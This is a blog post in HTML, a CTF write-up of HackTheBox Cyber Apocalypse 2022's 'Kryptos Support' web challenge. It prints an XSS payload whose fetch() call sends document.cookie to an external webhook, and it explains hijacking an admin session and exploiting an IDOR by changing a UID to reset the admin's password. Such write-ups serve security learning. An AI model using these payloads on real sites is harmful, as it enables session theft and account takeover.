<!DOCTYPE html>
<html
  dir="ltr"
  lang="en"
  data-theme=""
  
    class="html theme--light"
  
><head><script src="/livereload.js?mindelay=10&amp;v=2&amp;port=1313&amp;path=livereload" data-no-instant defer></script>
  <title>
    
      
        Cyber Apocalypse 2022 - Kryptos Support |
      Kalifornia909

  </title>

  
  <meta charset="utf-8" /><meta name="generator" content="Hugo 0.123.7"><meta name="viewport" content="width=device-width,initial-scale=1,viewport-fit=cover" />
  <meta name="author" content="Kalifornia909" />
  <meta
    name="description"
    content="A Web Challenge from HackTheBox&#39;s Cyber Apocalypse 2022"
  />
  
  
    
    
    <link
      rel="stylesheet"
      href="/scss/main.min.1147aa5bacb4bce677a0e264073829caedb82fd18ea07a5f1d80521f539d1c45.css"
      integrity="sha256-EUeqW6y0vOZ3oOJkBzgpyu24L9GOoHpfHYBSH1OdHEU="
      crossorigin="anonymous"
      type="text/css"
    />
  

  
  <link
    rel="stylesheet"
    href="/css/markupHighlight.min.73ccfdf28df555e11009c13c20ced067af3cb021504cba43644c705930428b00.css"
    integrity="sha256-c8z98o31VeEQCcE8IM7QZ688sCFQTLpDZExwWTBCiwA="
    crossorigin="anonymous"
    type="text/css"
  />
  
  
  <link
    rel="stylesheet"
    href="/fontawesome/css/fontawesome.min.7d272de35b410fb165377550cdf9c4d3a80fbbcc961e111914e4d5c0eaf5729f.css"
    integrity="sha256-fSct41tBD7FlN3VQzfnE06gPu8yWHhEZFOTVwOr1cp8="
    crossorigin="anonymous"
    type="text/css"
  />
  
  <link
    rel="stylesheet"
    href="/fontawesome/css/solid.min.55d8333481b07a08e07cf6f37319753a2b47e99f4c395394c5747b48b495aa9b.css"
    integrity="sha256-VdgzNIGwegjgfPbzcxl1OitH6Z9MOVOUxXR7SLSVqps="
    crossorigin="anonymous"
    type="text/css"
  />
  
  <link
    rel="stylesheet"
    href="/fontawesome/css/regular.min.a7448d02590b43449364b6b5922ed9af5410abb4de4238412a830316dedb850b.css"
    integrity="sha256-p0SNAlkLQ0STZLa1ki7Zr1QQq7TeQjhBKoMDFt7bhQs="
    crossorigin="anonymous"
    type="text/css"
  />
  
  <link
    rel="stylesheet"
    href="/fontawesome/css/brands.min.9ed75a5d670c953fe4df935937674b4646f92674367e9e66eb995bb04e821647.css"
    integrity="sha256-ntdaXWcMlT/k35NZN2dLRkb5JnQ2fp5m65lbsE6CFkc="
    crossorigin="anonymous"
    type="text/css"
  />
  
  <link rel="shortcut icon" href="/favicons/favicon.ico" type="image/x-icon" />
  <link rel="apple-touch-icon" sizes="180x180" href="/favicons/apple-touch-icon.png" />
  <link rel="icon" type="image/png" sizes="32x32" href="/favicons/favicon-32x32.png" />
  <link rel="icon" type="image/png" sizes="16x16" href="/favicons/favicon-16x16.png" />

  <link rel="canonical" href="http://localhost:1313/post/cyber-apocalypse_kryptos/" />

  
  
  
  
  <script
    type="text/javascript"
    src="/js/anatole-header.min.f9132794301a01ff16550ed66763482bd848f62243d278f5e550229a158bfd32.js"
    integrity="sha256-&#43;RMnlDAaAf8WVQ7WZ2NIK9hI9iJD0nj15VAimhWL/TI="
    crossorigin="anonymous"
  ></script>

  
    
    
    <script
      type="text/javascript"
      src="/js/anatole-theme-switcher.min.d6d329d93844b162e8bed1e915619625ca91687952177552b9b3e211014a2957.js"
      integrity="sha256-1tMp2ThEsWLovtHpFWGWJcqRaHlSF3VSubPiEQFKKVc="
      crossorigin="anonymous"
    ></script>
  

  


  
  <meta name="twitter:card" content="summary_large_image" />
<meta name="twitter:image" content="http://localhost:1313/images/site-feature-image.png" /><meta name="twitter:title" content="Cyber Apocalypse 2022 - Kryptos Support"/>
<meta name="twitter:description" content="A Web Challenge from HackTheBox&#39;s Cyber Apocalypse 2022"/>



  
  <meta property="og:title" content="Cyber Apocalypse 2022 - Kryptos Support" />
<meta property="og:description" content="A Web Challenge from HackTheBox&#39;s Cyber Apocalypse 2022" />
<meta property="og:type" content="article" />
<meta property="og:url" content="http://localhost:1313/post/cyber-apocalypse_kryptos/" /><meta property="og:image" content="http://localhost:1313/images/site-feature-image.png" /><meta property="article:section" content="post" />
<meta property="article:published_time" content="2022-05-15T22:15:58+09:00" />
<meta property="article:modified_time" content="2022-05-15T22:15:58+09:00" /><meta property="og:site_name" content="Kalifornia&#39;s Tech Wonderland" />




  
  
  
  
  <script type="application/ld+json">
    {
        "@context": "http://schema.org",
        "@type": "BlogPosting",
        "articleSection": "post",
        "name": "Cyber Apocalypse 2022 - Kryptos Support",
        "headline": "Cyber Apocalypse 2022 - Kryptos Support",
        "alternativeHeadline": "",
        "description": "
      A Web Challenge from HackTheBox\u0027s Cyber Apocalypse 2022


    ",
        "inLanguage": "en",
        "isFamilyFriendly": "true",
        "mainEntityOfPage": {
            "@type": "WebPage",
            "@id": "http:\/\/localhost:1313\/post\/cyber-apocalypse_kryptos\/"
        },
        "author" : {
            "@type": "Person",
            "name": "Kalifornia909"
        },
        "creator" : {
            "@type": "Person",
            "name": "Kalifornia909"
        },
        "accountablePerson" : {
            "@type": "Person",
            "name": "Kalifornia909"
        },
        "copyrightHolder" : {
            "@type": "Person",
            "name": "Kalifornia909"
        },
        "copyrightYear" : "2022",
        "dateCreated": "2022-05-15T22:15:58.00Z",
        "datePublished": "2022-05-15T22:15:58.00Z",
        "dateModified": "2022-05-15T22:15:58.00Z",
        "publisher":{
            "@type":"Organization",
            "name": "Kalifornia909",
            "url": "http://localhost:1313/",
            "logo": {
                "@type": "ImageObject",
                "url": "http:\/\/localhost:1313\/favicons\/favicon-32x32.png",
                "width":"32",
                "height":"32"
            }
        },
        "image": 
      [
        
        "http://localhost:1313/images/site-feature-image.png"


      
      ]

    ,
        "url" : "http:\/\/localhost:1313\/post\/cyber-apocalypse_kryptos\/",
        "wordCount" : "519",
        "genre" : [ 
      
      "CTF"

    
      
        ,

      
      "Ethical Hacking"

    
      
        ,

      
      "Pentesting"

    ],
        "keywords" : [ 
      
      "XSS"

    
      
        ,

      
      "IDOR"

    
      
        ,

      
      "WEB"

    
      
        ,

      
      "Burpsuite"

    
      
        ,

      
      "CTF"

    
      
        ,

      
      "CyberApocalypse 2022"

    ]
    }
  </script>


</head>
<body class="body">
    <div class="wrapper">
      <aside
        
          class="wrapper__sidebar"
        
      ><div
  class="sidebar
    animated fadeInDown
  "
>
  <div class="sidebar__content">
    <div class="sidebar__introduction">
      <img
        class="sidebar__introduction-profileimage"
        src="/images/logo.jpg"
        alt="profile picture"
      />
      
        <div class="sidebar__introduction-title">
          <a href="/">Kalifornia&#39;s Tech Wonderland</a>
        </div>
      
      <div class="sidebar__introduction-description">
        <p></p>
      </div>
    </div>
    <ul class="sidebar__list">
      
        <li class="sidebar__list-item">
          <a
            href="https://www.linkedin.com/in/joshua-gaede/"
            target="_blank"
            rel="noopener me"
            aria-label="Linkedin"
            title="Linkedin"
          >
            <i class="fab fa-linkedin fa-2x" aria-hidden="true"></i>
          </a>
        </li>
      
        <li class="sidebar__list-item">
          <a
            href="https://github.com/zer0sense"
            target="_blank"
            rel="noopener me"
            aria-label=""
            title=""
          >
            <i class="fab fa-github fa-2x" aria-hidden="true"></i>
          </a>
        </li>
      
        <li class="sidebar__list-item">
          <a
            href="https://twitter.com/kalifornia909"
            target="_blank"
            rel="noopener me"
            aria-label=""
            title=""
          >
            <i class="fab fa-twitter fa-2x" aria-hidden="true"></i>
          </a>
        </li>
      
    </ul>
  </div><footer class="footer footer__sidebar">
  <ul class="footer__list">
    <li class="footer__item">
      &copy;
      
        2020-2025
      
    </li>
    
  </ul>
</footer>
  
  <script
    type="text/javascript"
    src="/js/medium-zoom.min.1248fa75275e5ef0cbef27e8c1e27dc507c445ae3a2c7d2ed0be0809555dac64.js"
    integrity="sha256-Ekj6dSdeXvDL7yfoweJ9xQfERa46LH0u0L4ICVVdrGQ="
    crossorigin="anonymous"
  ></script></div>
</aside>
      <main
        
          class="wrapper__main"
        
      >
        <header class="header"><div
  class="
    animated fadeInDown
  "
>
  <a role="button" class="navbar-burger" data-target="navMenu" aria-label="menu" aria-expanded="false">
    <span aria-hidden="true" class="navbar-burger__line"></span>
    <span aria-hidden="true" class="navbar-burger__line"></span>
    <span aria-hidden="true" class="navbar-burger__line"></span>
  </a>
  <nav class="nav">
    <ul class="nav__list" id="navMenu">
      
      
        
        
          <li class="nav__list-item">
            
            <a
              
              href="/"
              
              title=""
              >Home</a
            >
          </li>
        

      
        
        
          <li class="nav__list-item">
            
            <a
              
              href="/about/"
              
              title=""
              >About</a
            >
          </li>
        

      
        
        
          <li class="nav__list-item">
            
            <a
              
              href="/tags/"
              
              title=""
              >Tags</a
            >
          </li>
        

      
        
        
          <li class="nav__list-item">
            
            <a
              
              href="/categories"
              
              title=""
              >Categories</a
            >
          </li>
        

      
    </ul>
    <ul class="nav__list nav__list--end">
      
      
        <li class="nav__list-item">
          <div class="themeswitch">
            <a title="Switch Theme">
              <i class="fas fa-adjust fa-fw" aria-hidden="true"></i>
            </a>
          </div>
        </li>
      
    </ul>
  </nav>
</div>
</header>
  <div
    class="post 
      animated fadeInDown
    "
  >
    
    <div class="post__content">
      <h1>Cyber Apocalypse 2022 - Kryptos Support</h1>
      
        <ul class="post__meta">
          <li class="post__meta-item">
            <em class="fas fa-calendar-day post__meta-icon"></em>
            <span class="post__meta-text"
              >
                
                  15/5/2022
                

              
            </span>
          </li>
          <li class="post__meta-item">
            <em class="fas fa-stopwatch post__meta-icon"></em>
            <span class="post__meta-text">3-minute read</span>
          </li>
        </ul>
      <p>I&rsquo;ll have to admit. This being the first challenge in the web category for the Cyber Apocalypse CTF from HackTheBox definitely set the tone of what to expect. This challenge was an XSS and IDOR combination. Do your directory enumeration in the background. Let&rsquo;s see how it broke down.</p>
<h3 id="xss">XSS</h3>
<p>When navigating to the website you will notice this flash-like website bringing me back to memories of the early 2000&rsquo;s.</p>
<figure><img src="/images/Posts/016/Kryptos.jpg"/>
</figure>

<p>There is an input field!!! What can we do? Well trying the default XSS to do a popup <code>&lt;script&gt;&quot;XSS&quot;&lt;/script&gt;</code> returned nothing. You can notice there is a backend button on the top left. Once you navigate there, you will be greeted with a login page.</p>
<figure><img src="/images/Posts/016/login.jpg"/>
</figure>

<p>Alright, if there is login then what are you options? You can try running Burpsuite to run a password attack with a password list. Yes, Yes you can. I don&rsquo;t know how happy HackTheBox would be with running the password attack, but after about 30 minutes of using the community edition of Burpsuite with no results you will look for other options. Did you know you can steal cookies using XSS? Well come to find out it is considerably faster than Burpsuite community edition. I have never done this before, so off to the best hacking tool ever invented&hellip;Google. I found two great walkthroughs from <a href="https://infinitelogins.com/2020/10/13/using-cross-site-scripting-xss-to-steal-cookies/">Infinite Logins</a> and from <a href="https://infinitelogins.com/2020/10/13/using-cross-site-scripting-xss-to-steal-cookies/">Portswigger</a> to get this going.</p>
<p>Following the Portswigger community solutions video you can notice the XSS script we will be using.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nx">fetch</span><span class="p">(</span><span class="s1">&#39;https://your_web_hook_url/&#39;</span><span class="p">,</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl"><span class="nx">method</span><span class="o">:</span> <span class="s1">&#39;POST&#39;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="nx">mode</span><span class="o">:</span> <span class="s1">&#39;no-cors&#39;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="nx">body</span><span class="o">:</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span>
</span></span><span class="line"><span class="cl"><span class="p">});</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;</span><span class="err">/script&gt;</span>
</span></span></code></pre></div><p>The fetch function of the walkthrough on Portswiggers community solution stumped me. They use Burpsuite&rsquo;s collaborator tool which is locked behind Burpsuite Pro. That is where Infinite Logins&rsquo; walkthrough saves the day. You can set up a <a href="https://webhook.link">webhook</a>. This will give us the cookie we will need.</p>
<figure><img src="/images/Posts/016/webhook_addy.jpg"/>
</figure>

<p>We will put this into the script above and full send this.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-javascript" data-lang="javascript"><span class="line"><span class="cl"><span class="o">&lt;</span><span class="nx">script</span><span class="o">&gt;</span>
</span></span><span class="line"><span class="cl"><span class="nx">fetch</span><span class="p">(</span><span class="s1">&#39;https://webhook.link/5f41db1a-e3c8-4906-aaac-89f67978ba91&#39;</span><span class="p">,</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl"><span class="nx">method</span><span class="o">:</span> <span class="s1">&#39;POST&#39;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="nx">mode</span><span class="o">:</span> <span class="s1">&#39;no-cors&#39;</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="nx">body</span><span class="o">:</span><span class="nb">document</span><span class="p">.</span><span class="nx">cookie</span>
</span></span><span class="line"><span class="cl"><span class="p">});</span>
</span></span><span class="line"><span class="cl"><span class="o">&lt;</span><span class="err">/script&gt;</span>
</span></span></code></pre></div><p>Once you see the message &ldquo;AN ADMIN WILL REVIEW YOUR TICKET SHORTLY!&rdquo; the payload has been sent.</p>
<figure><img src="/images/Posts/016/xss_send.jpg"/>
</figure>

<p>Now we need to grab our cookie data and make a cookie to log authenticate with.</p>
<figure><img src="/images/Posts/016/cookie.jpg"/>
</figure>

<p>Navigate back to the login page and open your browsers development tools to put the cookie information in,and refresh the page. The directory enumeration revealed a directory <code>/tickets/</code>. Navigate to that directory and you will see some tickets waiting for you.</p>
<figure><img src="/images/Posts/016/tickets.jpg"/>
</figure>

<p>What you are really after is the settings button on the top left hand corner. This will give you a change password prompt. Awesome!!</p>
<h3 id="idor">IDOR</h3>
<p>Fire up burpsuite and make sure intercept is on. We want to control what password we are changing. Enter the new password and hit update.</p>
<figure><img src="/images/Posts/016/password.jpg"/>
</figure>

<p>We will check burp and make sure it intercepted it to change it.</p>
<figure><img src="/images/Posts/016/burpidor.jpg"/>
</figure>

<p>The UID we will change from 100 to 1. This will be the admin password we are changing. We can confirm we changed the admin password on the login page it will say that we changed admin&rsquo;s password.</p>
<p>To finish this off log out and login as admin with your brand new complicated password to get the flag</p>
<hr>
<h2 id="hahahugoshortcode6s8hbhb">
<div style="position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;">
  <iframe src="https://www.youtube.com/embed/g9-Zta5OO_0" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;" allowfullscreen title="YouTube Video"></iframe>
</div>
</h2>

<div style="position: relative; padding-bottom: 56.25%; height: 0; overflow: hidden;">
  <iframe src="https://www.youtube.com/embed/UXtxfka2TuY" style="position: absolute; top: 0; left: 0; width: 100%; height: 100%; border:0;" allowfullscreen title="YouTube Video"></iframe>
</div>



  <h3>Related Posts</h3>
  <ul>
    
      <li><a href="/post/nahamcon2022-steam-locomotive/">Nahamcon2022 Steam Locomotive</a></li>
    
      <li><a href="/post/nahamcon2022-extravagant/">Nahamcon2022 EXtravagant</a></li>
    
      <li><a href="/post/nahamcon2022-prisoner/">Nahamcon2022 Prisoner</a></li>
    
  </ul>

</div>
    <div class="post__footer">
      
        <span><a class="category" href="/categories/ctf/">CTF</a><a class="category" href="/categories/ethical-hacking/">Ethical Hacking</a><a class="category" href="/categories/pentesting/">Pentesting</a></span>


      

      
        <span><a class="tag" href="/tags/xss/">XSS</a><a class="tag" href="/tags/idor/">IDOR</a><a class="tag" href="/tags/web/">WEB</a><a class="tag" href="/tags/burpsuite/">Burpsuite</a><a class="tag" href="/tags/ctf/">CTF</a><a class="tag" href="/tags/cyberapocalypse-2022/">CyberApocalypse 2022</a></span>


      
    </div>

    
  </div>

      </main>
    </div><footer class="footer footer__base">
  <ul class="footer__list">
    <li class="footer__item">
      &copy;
      
        2020-2025
      
    </li>
    
  </ul>
</footer>
  
  <script
    type="text/javascript"
    src="/js/medium-zoom.min.1248fa75275e5ef0cbef27e8c1e27dc507c445ae3a2c7d2ed0be0809555dac64.js"
    integrity="sha256-Ekj6dSdeXvDL7yfoweJ9xQfERa46LH0u0L4ICVVdrGQ="
    crossorigin="anonymous"
  ></script></body>
</html>
